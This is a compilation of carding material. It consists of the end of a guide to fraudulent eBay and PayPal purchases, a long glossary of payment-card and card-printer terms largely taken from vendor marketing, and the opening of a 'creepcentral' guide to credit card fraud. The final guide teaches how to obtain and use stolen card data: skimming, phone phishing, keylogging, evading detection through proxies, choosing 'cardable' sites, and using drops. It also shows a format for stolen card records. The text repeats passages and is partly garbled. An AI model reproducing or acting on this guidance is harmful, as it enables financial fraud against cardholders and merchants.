wait, appears Checkout complete. +7. After payment go to the Soap Holder, delete the letter for payment, adding @paypal.com in black. +ready. waiting for a track on the soap breaks the track or in another way, faster. +as we have the official payment system through eBay, and not split-we can see the View order details in + +front of the item purchased in box won (List purchased). +Track there will be faster. +Also possible to work through the bank. ACC. but this is a somewhat different topic. +Good Luck to all carders. +Carding Terms +AMVA--Association of American Motor Vehicle Agencies +ACCOUNT NUMBER--A unique sequence of numbers assigned to a cardholder account that identifies +the issuer and type of financial transaction card. +ACQUIRER--A licensed member that maintains the merchant relationship and acquires the data relating +to a transaction from the merchant or card acceptor and submits that data into interchange, either directly +or indirectly. +ADDRESS VERIFICATION SERVICE--A fraud prevention tool designed for mail order, telephone +order and Internet transactions. +AMC--American Magnetics Corporation +AUTHORIZE--A process defined in operations regulations whereby a transaction is approved by or on +behalf of an issuer; commonly understood to be receiving a sales validation by the merchant, by +telephone, or authorization terminal. +AUTOMATED TELLER MACHINE (ATM)--An unattended, magnetic stripe-reading terminal that +dispenses cash; accepts deposits and loan payments; enables a bank customer to order transfers among +accounts and make account inquiries. +BANKCARD--A debit or credit card issued by a bank or other financial institution, such as a MasterCard +card or Visa card. BIOMETRICS--Biometrics utilize "something you are" to authenticate identification. +This might include fingerprints, retina pattern, iris, hand geometry, vein patterns, voice password, or +signature dynamics. Biometrics can be used with a smart card to authenticate the user. The user's +biometrics information is stored on a smart card, the card is placed in a reader, and a biometrics scanner +reads the information to match it against that on the card. This is a fast, accurate, and highly-secure form + +of user authentication. +BIT (Binary Digit)--The smallest unit of information in a binary system: a 1 or 0 condition. +BPI--Bits Per Inch. +BYTE--A binary clement string functioning as a unit. Eight-bit bytes are most common. Also called a +"character". +BUSINESS CARD--A Business card is similar to the Corporate card, but issued to a business with a few +employees and where each employee is responsible for their purchases. +CARDHOLDER--The customer to whom a card has been issued or the individual authorized to use the +card. +CARDING--Credit card fraud. Carding texts offer advice on how to make credit cards, how to use them, +and otherwise exploit the credit card system. +CASH DISBURSEMENT--A transaction that is posted to a cardholder's credit card account in which the +cardholder receives cash at an ATM, or cash or travelers checks at a branch of a member financial +institution or at a qualified and approved agent of a member financial institution. +CIRRUS SYSTEM INCORPORATED--A wholly owned subsidiary of MasterCard International +Incorporated, operates the international ATM sharing association known as "Cirrus® ATM Network." +CLEANING--The process of exchanging financial transaction details between an acquirer and an issuer +to facilitate posting of a cardholder's account and reconciliation of a customer's settlement position. +CO-BRANDED CARD--A credit card issued by a member bank and a merchant, bearing the "brand" of +both. +CARDJET CARDS--Teslin®-based, CR-80 size cards with a surface that is specially formulated for +thermal inkjet printing. CardJet Inks bond to cards and dry instantly, without smearing. CardJet cards +stand up well to abrasion, dye-migration and UV fading. + +CHECK READER--A peripheral device used to read encoded information on a check to be transmitted +and processed by a computer or register for authorization and approval. +COERCIVITY--The measure of how much magnetic force is needed to change the state of a magnetized +element. The higher the coercivity, the more force is needed. There are two types of magnetic stripe +cards, low coercivity and high coercivity. While low coercivity cards can be erased if they get too close to +a common magnet, high coercivity cards are not as easily erased. +COLOR MATCHING--Several color matching options are included with FARGO Card Printer/Encoders. +These options are built directly into the printer driver so they are easily selected. Colors print with more +clarity, detail, and accuracy. +COLOR MONITOR--A monitor that displays data and graphics in color. Color monitors vary in the +number of colors, dot-pitch and intensities they can produce. +COMMPORT--Communications Port. Most IBM compatible computers have from one to four +commports used to communicate with devices attached to the computer (COM1, COM2, COM3, COM4). +You need a commport to communicate with the 712 Encoder. +COMMUNICATION PROTOCOL--The rules governing the exchange of information between devices +on a data link. +CONTACT SMART CARD ENCODER--The contact smart card encoder connects the ISO contact pins +mounted on the e-card docking station to a Gemplus GemCore 410 smart card coupler mounted inside the +printer. The GemCore 410's digital I/O is converted to a RS-232 signal which is accessible to application +programs through a dedicated DB-9 port on the outside of the printer labeled "Smart Card." +CONTACTLESS SMART CARD ENCODER--The contactless smart card encoder connects an antenna +mounted on the e-card docking station to a Gemplus GemEasyLink 680SL coupler mounted inside the +printer/encoder. Application programs can access Mifare® contactless cards via a RS-232 signal through +a dedicated DB-9 port on the outside of the printer labeled "Mifare/Contactless." +CONTROL NUMBERS--Measure card usage and be used as a tracking device if the card is lost. ID +Services will print these on cards after the numbers have been supplied. + +CREDIT CARD AUTHORIZATION--The process in which a credit card is accepted, read and approved +for a sales transaction. Credit card authorization is normally accomplished by reading a credit cared +through a credit card reader that is integrated into a register or stand-alone reading device. Generally, +pertinent credit information is transmitted via a modem and telephone line to a credit card +"clearinghouse". The clearing house (authorization source) communicates with the credit card’s bank for +approval and the appropriate debit amount of the sale. +CREDIT CARD READER (Magnetic Stripe Reader)--A device that reads the magnetic stripe on a credit +card for account information to automatically be processed for a transaction. A credit card reader is either +integrated into a register, attached onto a register as a separate component or is part of a stand-alone +terminal dedicated for the sole function of processing credit card transactions. +CURSOR--A blinking symbol on the screen that shows where data may be entered next. +CUSTOMER POLE DISPLAY--A peripheral device designed to show customers information about their +transaction. This information normally consists of a description and price of the product they are +purchasing. Customer pole displays are also used to display marketing information and other messages. +COMMERCIAL CARDS--This is the formal name for a group of cards issued to businesses, commercial +organizations and governments. Types of commercial cards include: Corporate Card, Purchase Card, and +Business Card. Corporate card A Corporate card is usually issued to the employees of a corporation, +where the corporation assumes all liability for the card's usage. These tend to be to larger corporations. +CURRENCY CONVERSION--The process by which the transaction currency is converted into the +currency of settlement or the currency of the issuer for the purpose of facilitating transaction +authorization, clearing and settlement reporting. The acquirer determines the currency of the transaction; +the currency of the issuer is the preferred currency used by the issuer, and most often, the currency in +which the cardholder will be billed. +DEBIT CARD--A plastic card used to initiate a debit transaction. In general, these transactions are used +primarily to purchase goods and services and to obtain cash, for which the cardholder's asset account is +debited by the issuer +DECODE--A term used to describe the process of interpreting scanned or "read" information and +presenting it in a usable fashion to the computer. +DENSITY--Defined in bits per inch (BPI), recording density is the number of information bits which are +recorded on one inch of a magnetic strip. + +DIRECT THERMAL--Direct thermal is a printing technology method in which the printer utilizes a +paper that reacts chemically to heat. The label rolls are coated with a thermo-sensitive layer that darkens +when exposed to intense heat. Direct thermal printers require no ink or ribbon and are typically used +when a bar code label needs to endure for a year or less. +DIRECT-TO-CARD (DTC) PRINTING--The Direct-to-Card printing process prints digital images +directly onto any plastic card with a smooth, clean, glossy PVC surface. +DISKETTE / FLOPPY DISK--A flexible disk which holds information that can be read by the computer. +DOS (Disk Operation System)--The standard operation system for all computers advertised as "IBM +Compatible". +DOT-MATRIX PRINTER--A printer that forms characters or images using a matrix of pins that strike an +inked ribbon. +DOWNLOADING--The process of sending configuration parameters, operating software or related data +from a central source to remote stations. +DPI (dots per inch)--Measurement of a printer's resolution. Example: 600 dpi indicates that the printer can +produce 600 dots of color in each inch of a card. NOTE: When judging color reproduction for a CardJet +Card Printer, the inkjet resolution must be at 2400 dpi or better to achieve the color equivalent of a 300 +dpi dye-sub printer. +DUAL HOPPERS--Select FARGO Card Printer/Encoders provide a dual-stack, 200 card capacity Card +inp<-b>ut Hopper. This unique dual hopper allows you to load up to 200 of the same type of card for +maximum card production or allows you to load a different stack of cards into each hopper for added +versatility and efficiency. Loading two different stacks of cards is often beneficial if, for example, you are +using two types of preprinted card backgrounds (i.e. gold cards versus silver cards) in order to more easily +distinguish between two types of members, employees, students, etc. +DUAL TRACK--A type of credit cared reader that is capable of reading both Track 1 and 2 on a credit +card. +DYE-SUBLIMATION--Dye-sublimation is the print process FARGO Card Printer/Encoders use to print +smooth, continuous-tone, photo-quality images. This process uses a dye-based ribbon roll that is divided +into a series of color panels. The color panels are grouped in a repeating series of three separate colors + +along the length of the ribbon: Yellow, Magenta, and Cyan (YMC). As the ribbon and card pass +simultaneously beneath the Printhead, hundreds of thermal elements heat the dyes on the ribbon. Once the +dyes are heated, they vaporize and diffuse into the surface of the card. Varying the heat intensity of each +thermal element within the Printhead makes it possible for each transferred dot of color to vary saturation. +This blends one color into the next. The result is continuous-tone, photo-realistic color images. +E-CARD DOCKING STATION--FARGO provides an optional e-card docking station on select models +that can be ordered with encoders for one, two or three different types of e-cards. These printer/encoders +allow application software to read and/or store information in the memory of e-cards. The optional +encoders provide everything needed for an application program to communicate with a specific type e- +card through a standard RS-232 interface. The FARGO e-card docking station comes standard with the +read/write pins (as defined by ISO) needed to communicate with contact smart cards. The e-card docking +station can also be ordered with a magnetic stripe encoder for either an ISO magnetic stripe that supports +dual high/low coercivity tracks 1, 2 and 3 or a JIS II magnetic stripe. +E-CARD ENCODER--Select FARGO Card Printer/Encoders support reading and/or storing information +in up to three different types of e-cards: ISO 7816 contact smart cards, Mifare® contactless smart cards +and HID proximity cards. +EDGE-TO-EDGE--Refers to the maximum printable area on a card. Printer/Encoders with edge-to-edge +printing capability can print just to the edge of a card resulting in printed cards with virtually no border. +EMBOSSING--Raised characters are produced through the use of a male and female die brought together +by pressure applied above and below a marking surface. Embossing is ideal for variable information data +cards, strip tags, and identification molding processes. +EBT (ELECTRONICS BENEFITS TRANSACTION)--Allows governments to implement social aid +programs such as food stamps through the use of a magnetic-stripe card, which can be accepted at +merchant locations set up to accept this plan. +ELECTRONIC DRAFT CAPTURE (EDC)--A system in which the transaction data is captured at the +merchant location for processing and storage. +ELECTRONIC FUNDS TRANSFER (EFT)--A paperless transfer of funds initiated from a terminal, +computer, telephone instrument, or magnetic tape. +EMBOSS-The process of printing identifying data on a bankcard in the form of raised characters. + +ENTERPRISE--An "enterprise" e-commerce solution indicates technology for a large business enterprise. +This usually involves a number of systems that are required to interface with each other as well as a +central database management system. The design and management of an enterprise solution can be very +complex. +EMULATION--The imitation of a computer system, performed by a combination of hardware and +software, that allows programs to run between incompatible systems. +ENCODER--A device used to write data onto magnetic stripe cards. +EPROM--Read-only, non-volatile, semi-conductor memory that is erasable via ultra violet light and +reprogrammable. +EXPANSION BOARD / EXPANSION SLOT--The optional device board that is usually added inside the +system cabinet at an available expansion slot. +FACTORING--Also known as laundering. When a merchant submits transactions for another merchant +that were not conducted at the original merchant's business establishment, this is known as factoring. +FIRMWARE--A computer program or software stored permanently in PROM or ROM. +FIELDS--A specific position on each track where data may be written or read. +FIXED DATA--Data which doesn't change. In Card Template, data remains constant from encoding +session to encoding session. This means that, until it is modified, each card will encoded with this +information. In Set-Up/Encode Fields, data is fixed. +FOIL--Decorative foils are applied to cards with heat. If you have a specific foil in mind, we can apply it +for you, ID Services has a wide variety to choose from. +HAND-HELD DATA COLLECTOR--See Portable Data Collector + +HARD DISK DRIVE--Enclosed disk drive that contains one or more metallic disks for data storage. A +hard disk has many times the capacity of a diskette. +HIGH COERCIVITY--See coercivity. +HIGH-VOLUME PRINTING--Fast, efficient printing for producing large quantities of cards with +minimal down time for supplies loading or maintenance. +HIGH DEFINITION PRINTING™ (HDP™)--The High-Definition Printing process prints full-color +images onto clear HDP transfer film. The HDP film is then fused to the card through heat and pressure +via a heated roller. This revolutionary technology enhances card durability and consistently produces the +best card color available - even on tough-to-print matte-finished cards, proximity cards, and smart cards. +HIGH SPEED PRINTING--FARGO Card Printer/Encoders are among the fastest desktop card +printer/encoders in the industry. High-speed printing allows for more efficient card production - saving +time, money, and resources. +HOLOGRAM--This security feature prevents the reproduction of ATM/Bank cards and credit cards. ID +Services has a variety of holograms to choose from or will apply your own custom hologram. +HOST COMPUTER--A central computer, such as a mainframe computer at a company’s headquarters or +central office. The central computer in a star network. +ISO--International Standards Organization specification for magnetic stripe encoding. The FARGO +encoder supports dual high/low coercivity and tracks 1, 2 and 3. +ID CARDS--An important record-keeping tool for hospitals, nursing homes, healthcare providers, +insurance companies and colleges/universities are ID cards. ID Services offers them in four sizes, CR50, +60, 70 and 80, to fit any standard imprinting or embossing system. ID Services offers a variety of card +compositions to meet the needs of the specific application. Composite cards are recommended for +College/University ID’s due to their flexibility and long life span. +IN-COUNTER SCANNER--A bar code scanner that normally has multiple laser beams emitting from it +to read bar codes in high-speed environments (i.e. grocery stores). An in-counter scanner is usually +mounted into a countertop so that products can quickly and easily be passed over the scanner for bar code +reading. + +IMPRINTER--A device supplied to the merchant to produce an image of the embossed characters of the +bankcard on all copies of sales drafts and credit slips. +ISSUER--A member that enters into a contractual agreement with MasterCard or Visa to issue +MasterCard or Visa cards. +JIS II--Japanese Industrial Standard for magnetic stripe encoding, published and translated into English +by Japan Standards Association. +KEYLOCK CARDS--Hotels and resorts all over the world are changing the traditional door locks to +electronic swipe key cards. Keylock cards are becoming a necessity to keep hotel guests safe. For +excellent performance, the cards must match the system and the applications. ID Services offers roll-on +magnetic stripes as well as laminated magnetic stripes in both high energy and low energy coercivity with +the hotel and/or its logo perfectly printed. +KEY GENERATOR--Any tool designed to break software copy protection by extracting internally-stored +keys, which can then be entered into the program to convince it that the user is an authorized purchaser. +KEY LOGGER--(Keystroke Logger). A program that runs in the background, recording all the +keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw +to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or +possibly other useful information that could be used to compromise the system or be used in a social +engineering attack. For example, a key logger will reveal the contents of all e-mail composed by the user. +Keylog programs are commonly included in rootkits and RATs (remote administration trojans). +LCD DISPLAY--The LCD - or Liquid Crystal Display - shows the current status of the printer, and +changes according to the printer's current mode of operation. LCD communicates an error with text, +which is easier to interpret than LED lights. +LOW COERCIVITY--See coercivity. +LASER SCANNER--A bar code scanner that utilizes laser technology. These scanners emit laser beams +that read bar codes. Laser scanners have "depth of field" which enables them to read bar codes from short + +distances away (6" to a few feet). +LED (Light Emitting Diode)--A semiconductor light source that emits visible light or invisible infrared +radiation. +LOCKABLE HOPPER--Some FARGO Card Printer/Encoders provide a lockable Card Hopper Door. +This lock is intended to help prevent theft of your blank card stock. This feature is especially helpful if +using valuable card stock such as preprinted cards, smart cards, or cards with built-in security features +such as holograms. +MAGSTRIPE STRIPE--The magnetically encoded stripe on the bankcard plastic that contains +information pertinent to the cardholder account. The physical and magnetic characteristics of the +magnetic stripe are specified in ISO Standards 7810, 7811, and 7813. +MAGNETIC STRIPE READER--A device that reads information recorded on the magnetic stripe of a +card. +MEMBER--An institution that participates in the programs offered by MasterCard International +Incorporated. +MERCHANT--A retailer, or any other person, firm, or corporation that (pursuant to a merchant +agreement) agrees to accept credit cards, debit cards, or both, when properly presented. +MAS (Merchant Accounting System)--The Vital back-end system that handles settlement, interchange +and billing. + +MERCHANT BANK--A bank that has entered into an agreement with a merchant to accept deposits +generated by bankcard transactions; also called the acquirer or acquiring bank. +MCC (MERCHANT CATEGORY CODE)--Four-digit classification codes used in the warning bulletin, +authorization, clearing, and settlement systems to identify the type of merchant business in various stages +of transaction processing. +MMS (MERCHANT MANAGEMENT SYSTEM)--The Vital front-end system that handles point of sale +functions such as terminal types, cut-off times, etc. +MOTO (MAIL ORDER/TELEPHONE ORDER)--A transaction initiated by mail or telephone to be +debited or credited to a bankcard account. +MAGNETIC STRIPE--The black stripe found on the back of most credit cards and many other types of +identification cards and drivers licenses. Used to encode and read data, usually identifying the owner of +the card. +MAGNETIC (“MAG”) STRIPE--Mag Stripe refers to the black or brown magnetic stripe on a card. The +stripe is made of magnetic particles of resin. The resin particle material determines the coercivity of the +stripe; the higher the coercivity, the harder it is to encode -- and erase -- information from the stripe. +Magnetic stripes are often used in applications for access control, time and attendance, lunch programs, +library cards, and more. +MAGNETIC STRIPES--Offered in five different sizes and are available in both low coercivity (300 +oersteds) and high coercivity (2750 (USA), or 4000 (European) oersteds.) +· 1/8" Covers one track (HEM only) +· 5/16" Covers two tracks + +· 6/16" Covers three tracks (3/8") +· 7/16" Covers three tracks +· 8/16" Covers three and one half tracks (1/2") +· 9/16" Covers four tracks (super stripe) +· We can apply roll-on magnetic stripes as well as flush laminated magnetic stripes. +For additional security ID Services offers holo-magnetic stripes. The stripes are custom made with your +company name appearing in the stripe. Multiple magnetic stripes can be applied to each card. +MAGNETIC STRIPE READER--See Credit Card Reader +MASTER REGISTER--A cash register that acts as the central register or "file server" in a multiple +register environment. The master register normally controls "slave" registers that are networked and cable +to it. +MEGABYTE--A unit of measure that consists of 1,014 bytes. +MICROCOMPUTER (Personal Computer)--A small. low cost computer originally designed for +individual users. Recently, microcomputers have become powerful tools for many businesses that, when +networked together, have replace minicomputers and in some cases mainframes and information tools. +MICRO-PRINTING--Very small text printed into the plastic card and generally look like thin lines to the +naked eye. The text is printed at 9600 dpi (dots per inch) and require a magnifying glass to view the +micro-printed text. Desktop card printers print at 300 dpi and can not reproduce micro-printing making +micro-printing a very handy feature when checking for counterfeit cards. +MICROPROCESSOR--Integrated circuit chip that monitors, controls and executes the machine language +instructions. + +MICR READER--MICR is an acronym for Magnetic Ink Character Recognition. MICR Readers are +normally used to read the encoded information within the ink on a check. +MODEM (Modulator - Demodulator)--A device used to convert serial digital data for transmission over a +telephone channel, or to reconvert the transmitted signal to serial digital data for acceptance by a +receiving terminal. +MONOCHROME MONITOR--A monitor that displays characters in only one color, such as amber or +green. +MULTI-USER--Multi-user systems consist of two or more computers that are connected together and +that share data and peripherals. A multi-user system includes a host computer (file server) and one or +more stations. All stations share the same hard disk and may share other devices such as printers. +MTBF (Mean Time Between Failures)--The average time between failures of a particular device based on +statistical or anticipated experience. +NETWORK--A communications system connecting two or more computers and their peripheral devices. +NETWORK CARD--An expansion card that is installed in an available slot in a computer so that it may +connect and communicate to another computer. +OPERATING SYSTEM--System that consists of several programs that help the computer manage its +own resources, such as manipulating files, running programs and controlling the keyboard and screen. +OUTPUT STACKER--The Output Stacker stores printed cards in a first-in/first-out order. This feature +makes it easy to keep printed cards in a specific order for faster issuance or to print serialized cards. +OVERSIZED CARDS--Oversized cards are used for more efficient visual identification and are available +in many non-standard sizes. The most popular sizes are CR-90 (3.63" x 2.37"/92mm x 60mm) and CR- +100 (3.88" x 2.63"/98.5mm x 67mm). +OVERLAMINATE--Protective clear or holographic material designed to offer advanced card security + +and durability. Two types are available from FARGO: Thermal Transfer Overlaminate is a .25 mil thick +material that enhances card security and durability. PolyGuard Overlaminate is available in a 1 mil and .6 +mil thick material and provides extraordinary protection for applications that require highly durable cards. +OVERLAY PANEL--The clear overlay panel (O) is provided on dye-sublimation print ribbons. This +panel is automatically applied to printed cards and helps prevent images from premature wear or UV +fading. All dye-sublimation printed images must have either this overlay panel or an overlaminate applied +to protect them. +OVER-THE-EDGE--Refers to the maximum printable area on a card. Printer/Encoders with over-the- +edge printing capability can print past the edge of a card resulting in printed cards with absolutely no +border. +PARALLEL TRANSMISSION--Transmission mode that sends a number of bits simultaneously over +separate lines. Usually unidirectional. +PERIPHERAL DEVICE--Hardware that is outside of the system unit, such as a disk drive, printer, cash +drawer or scanner. +POLLING--A means of controlling devices on multi-point line. Usually utilized to send/receive +information via modem from remote computers to a central computer. +POLYGUARD™--A card overlaminate available in 1 mil and .6 mil thicknesses that provides +extraordinary card protection; ideal for harsh or more secure environments. Available as clear or with +embedded holographic-type security images. +POS (Point-of-Sale)--Term normally used to describe cash register systems that record transactions or the +area of "checkout" in a retail store. +PIN NUMBERS--This security feature will activate usage of the card. Once the numbers have been +supplied from our customers, ID Services can apply them to the customer cards. +PINPAD--A "pin pad" is a small keyboard that normally contains numeric keys. PIN is an acronym for +personal identification number which is normally entered into the keyboard "pad" to verify account +information for a transaction (i.e. similar to an automated teller machine). + +PORTABLE DATA COLLECTOR--A hand-held computer that can be used as a stand alone portable +unit for point-of-sale, inventory, receiving and other applications. A portable data collector is normally a +temporary storage device that gathers information and downloads data into a main or central computer. +PROGRAMMABLE KEYBOARD--A keyboard that is capable of being configured and programmed in a +variety of ways. Programmable keyboards allow keys to represent special departments, functions, +product, etc. +PROJECTION SCANNER--A type of bar code reader that is normally placed vertically, and that projects +laser beams horizontally to scan bar codes. Often used when high performance and speed to reading bar +codes is critical. +PROTOCOLS--A set of rules for the exchange of information, such as those used for successful data +transmission. +PROXIMITY (“PROX”) CARD--Proximity cards allow access and tracking utilizing contactless +technology (usually by communicating through a built-in antenna). +PROX CARD ENCODER--The prox card encoder uses a HID ProxPoint® Plus reader mounted on the e- +card docking station inside the printer/encoder. The ProxPoint is a "read only" device producing a +Wiegand signal that is converted to RS-232 using a Cypress Computer Systems CVT-2232. Application +programs can read information from HID prox cards via a RS-232 signal through a dedicated DB-9 port +on the outside of the printer labeled "Prox." +PVC (POLYVINYLCHLORIDE)--These cards are manufactured for mechanical style embossing and to +be our least expensive card option. They are available in 23 different colors and three different card +finishes. Heat distortion occurs at 130°F and the cards will flex approximately 2,500 flex cycles. +Estimated normal card life: 18 months. +PDF (PORTABLE DOCUMENT FORMAT--Adobe's file format is the de facto standard for electronic +document distribution. It is the preferred means of distributing documents online because it preserves +fonts, formatting, colors and graphics regardless of the application or platform used to create it. The +Adobe Acrobat Reader, required to read PDF files, is available free from the Adobe web site. +PIN PERSONAL IDENTIFICATION NUMBER)--A four-to-12 character secret code that allows an +issuer to positively authenticate the cardholder for the purpose of approving an ATM or terminal +transaction occurring at a point-of-interaction device. + +POTS (PLAIN OLD TELEPHONE SERVICE)--The standard analog telephone service with no +enhancements like call waiting, etc. +PURCHASE CARD--The Purchase card is issued to corporations, businesses and governments. It +provides control over daily and monthly spending limits, total credit limits, and where the card may be +used. It also reduces the administrative cost associated with authorizing, tracking, paying, and reconciling +those purchases. Many employees may be issued the same card number. +RAM (Random Access Memory)--Temporary storage that holds the program and data the CPU is +processing. +RESIN THERMAL TRANSFER--Resin Thermal Transfer is the process used to print sharp black text +and crisp bar codes that can be read by both infra-red and visible-light bar code scanners. It is also the +process used to print ultra-fast, economical one-color cards. Like dye-sublimation, this process uses a +thermal Printhead to transfer color from the ribbon roll to the card. The difference, however, is that solid +dots of color are transferred in the form of a resin-based ink which fuses to the surface of the card when +heated. This produces very durable, single-color images. +SCALE--A scale is a peripheral device used to record the weight of an item and transmit the amount to a +computer for processing. +SCRATCH-OFF PANELS--Applied through hot stamping or silk screening. Typically they are used to +cover pin numbers on pre-paid phone cards. +SERIAL TRANSMISSION--Transmission mode that sends data one bit at a time. In most cases, in +personal computers, serial data is passed through as RS232 serial interface port. +SIGNATURE CAPTURE--A peripheral device that electronically captures an individual’s signature for +customer identification and transaction applications. +SLAVE REGISTER--A cash register that is driven by a "master" register in a multiple register +environment. +SMART CARD--A smart card contains a "chip" with memory and is typically used to hold customer +account information and a "balance" of money similar to a checking account. The card is inserted into a +device that can read and write to it updating information appropriately. + +SMART CARD--Smart cards have an embedded computer circuit that contains either a memory chip or a +microprocessor chip. There are several types of smart cards: Memory, Contact, Contactless, Hybrid +(Twin), Combi (Dual Interface), Proximity and Vicinity. +SMARTGUARD™--SmartGuard is a printer security option that uses a custom access card and a built-in +reader to restrict printer access. With this feature, only those with a valid access card can print cards. This +makes both your printed cards and your overall system more secure. +SMARTLOAD™--SmartLoad is an exclusive FARGO technology used in CardJet Card and Ink +Cartridges to advise you on the status of your CardJet supplies. In CardJet Ink Cartridges, SmartLoad +technology reports the number of prints remaining in the cartridge and alerts you when ink is low or out. +In CardJet Card Cartridges, SmartLoad technology tells you to install a new cartridge when the card +supply runs out. +SMARTLOAD CARD CARTIDGE--Cartridge that is pre-loaded with CardJet Cards at the factory. They +snap into the back of the printer in just seconds. SmartLoad technology inside the cartridges alerts you to +install a new cartridge when the card supply runs out. +SMARTLOAD INK CARTIDGE--CardJet Ink Cartridges are available with both full-color and black +(used for infrared bar codes only) inkjet inks. Cartridges snap into the printer just like the cartridges used +in other familiar office or home inkjet printers. SmartLoad technology inside the cartridges reports the +number of prints remaining in the cartridge and alerts you when ink is low or out. +SMARTSHIELD™--This option allows the printer/encoder to print custom, reflective security images on +the card that fluoresce under a black or UV light source. +SOLENOID--Solenoids are commonly used in "dumb" cash drawers and incorporate a cable connected +trigger which releases the drawer. Cash drawers with solenoids are interfaced to receipt printers that +"drive" them. Solenoids have different voltages and are integrated into the cash drawer dependent on the +printer they are interfaced to. +STANDARD CARDS--The standard card size is CR-80. CR-80 dimensions are 3.375" x 2.125" (85.6mm +x 54mm). +THERMAL TRANSFER--Thermal transfer is a printing technology method in which printers use regular +paper and a heat sensitive ribbon. The ribbon deposits a coating of dark material on the paper when +exposed to intense heat. Thermal transfer printers produce a more durable label that won’t fade as quickly +as direct thermal labels and are often used when a label needs to endure longer than a year. + +THERMAL TRANSFER OVERLAMINATE--A card overlaminate available in a .25 mil thickness that +increases card security and durability; often used for moderate durability applications or when additional +security (such as holographic images) are needed. +TILL--The paper money and currency tray that holds money in a cash drawer. Tills are usually available +in 4 or 5 till versions, available with lock and cover and are removable. +TRACK--One of up to three portions of a magnetic stripe where data can be written. +TRACK 1--Track one is a "track" of information on a credit card that has a 79 character alphanumeric +field for information. Normally a credit card number, expiration date and customer name are contained on +track 1. +TRACK 2--Track two is a "track" of information on a credit card that has a 40 character field for +information. Normally a credit cad number and expiration date are contained on track 2. +TRACK3--Track three is a "track" of information on a credit card that has 107 character field for +alphanumeric information. Normally a credit card number, expiration date and room for additional +information are available on track 3. +UNIX--UNIX is a terminal based operation system in which "dumb" terminals are communicating back +to a "smart" processing unit or host. +UPS--An acronym for uninterruptible power source. A UPS is primarily used as a back up power source +for computers and computer networks to insure on-going operation in the event of a power failure. +Sophisticated units also have power conditioning and power monitoring features. +UV INKS--most commonly used to put hidden graphics and text on a plastic card. The inks are invisible +until the card is subjected to a certain colored light (for instance, when placing a California drivers license +under a black light the image of the California flag will become visible in green and orange.) UV inks are +used as an aid in detecting counterfeit cards. They come in a variety of colors and can react to different +colored lights. Desktop card printers are unable to print UV ink. +VARIABLE DATA--is information which changes with each encoding session or on a card-by-card +basis. + +VERTICAL SCANNER--See Projection Scanner. +WAND--A pen-shaped bar code scanner that emits a beam from the end or tip of the wand. Wands are +older, bar code reading technology but inexpensive and still widely used where speed and performance +are not crucial. +WEDGE--A wedge decodes "read" data (i.e. bar codes, credit cards) and communicates that information +through a keyboard port on a computer. The keyboard plugs into the wedge and the wedge device plugs +into the computer where the keyboard was. Sophisticated wedges can accept a few different peripheral +devices. Also See Decode +Carding +This is a creepcentral publication +Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing +addresses +Including drops and what you need to know;Huge guide written by me +Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing +addresses +Including drops and what you need to know;Huge guide written by me +kay major updates done to this carding yext, it will cover the basics of most carding knowledge. Going +into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 +different categories of their own. +kay major updates done to this carding text, it will cover the basics of most carding knowledge. Going +into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 +different categories of their own. +What I'm going to cover: +Online Carding +- A quick overview of what online carding is +- SOCKS and why we use them +- Finding a cardable site and what cardable means +- Carding "non cardable websites" with fake CC scans and other fake documents +Carding while on the job +- Getting CC, CVV, CVV2 through use of mobiles +- Skimming whilst on the job +- Using carbonless receipts to get details (pretty outdated method) +Trashing + +- Trashing for receipts and credit reports (pretty outdated although still works) +Phishing over the phone +- Phishing over the phone for details +Keylogging for CVV2s +- Hardware keylogging +Carding Instore +- What instore carding is (very brief) +- How it's done +- How to act and present yourself instore +Carding over the phone +- Carding over the phone +IRC +- Services provided in IRC +- Advantages to using IRC for info +- Disadvantages +- How to find carding channels (Will not go too much into this as there are secrets between fellow carders +which we like people interested enough to find out for themselves) +- Vendors and how to approach them +- How to rip in IRC (EVERY vendor, reliable or not has ripped some n00b who acted like they knew +what they were doing) +::::WU BUG BULLSHIT and how to rip n00bs and gain more:::: +Phishing for Change of billing +- What COB is and why it's useful +- Use through phishing pages +- Use through keylogging +Drops and what you need to know about them +- Drops and what you need to know about them +What carding is +Carding summed up quickly is the act of obtaining someone's credit card information, from the CC#, +CVV, CVV2, CVN, and the billing address, along with the expiry date and name of the person the card +belongs to along with a signature. +Online Carding +Online carding is the purchasing of goods done over the internet with the CVV2. +Now for you n00bies you're probably wondering what a CVV2 is, it's simply just the database of basic +info for the card such as the card type (e.g. Mastercard) First and last name, address and post code, phone +number of the card owner, the expiry date (and start date if it's a debit card or prepaid CC), the actual CC +number and the CVC (card verification code, which is the 3 digits on the back of the card). +This is the format you usually get them in when you buy off IRC: +:::MC ::: Mr Nigerian Mugu ::: 1234567890123456 ::: 09|11 ::: 01/15 ::: 123 ::: 123 fake street, +fakeville, ::: Fake City ::: DE24 TRH ::: 01234-567890 ::: +SOCKS and why we use them +Now with ANY fraud at all you have to take precautions so you don't make it easy for anyone to catch +you in your wrong doings. As usual I swear against TOR for carding/scammin because most nodes are +blacklisted by websites and because TOR cycles through various different proxies; and even if you +configure it to go straight through an exit node of your choice it's still not worth it. You can use JAP but + +make sure you're using some constant sock proxies from the same city, town or area that the card is from; +also go wardriving and use a VPN (don't trust anyone off IRC with these, you'll have to do some +searching around yourself for a highly trusted one and one which won't comply with LE). +You can get good SOCKS from anyproxy.net (people are selling accounts for the site in IRC all the time), +that's the best place but even I ended up losing the account eventually (unknowingly I was sharing it with +some Nigerian dude who became selfish). +So we use SOCKS because they stay constant. But don't let that get your guard down, you want FRESH +proxies everytime you card. +Finding a cardable site and what cardable means +Basically a cardable site holds these characteristics and what you should be looking for to determine an +easily "cardable" website: +- The top one you need to look for on the site's TOS is that they send to any address and not just the one +registered on the card (although you can easily get around this if they don't, with a COB, photoshopped +verification (will go into detail later) or some social engineering over the phone). +- The next important to look for is if they have a visa verification code or mastercard secure code (most of +the time if you ask your vendor they'll include them in your CVV2 details textfile), if they do have one of +these you have to put in and you don't have them then don't waste your time +- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to +your local drop) +- If they leave packages at the door when no one's in, or around the back in a safe area (I know of one site +in the UK that has all these qualities including this one, it is perfect for carding clothes) +- Also you can't forget to see what other security checks they need to do (if they need to call you up to +verify or want a utility bill, passport or a scan of the actual CC) +It is hard to find websites online now that have most of these qualities, therefore we have to use COBs +and 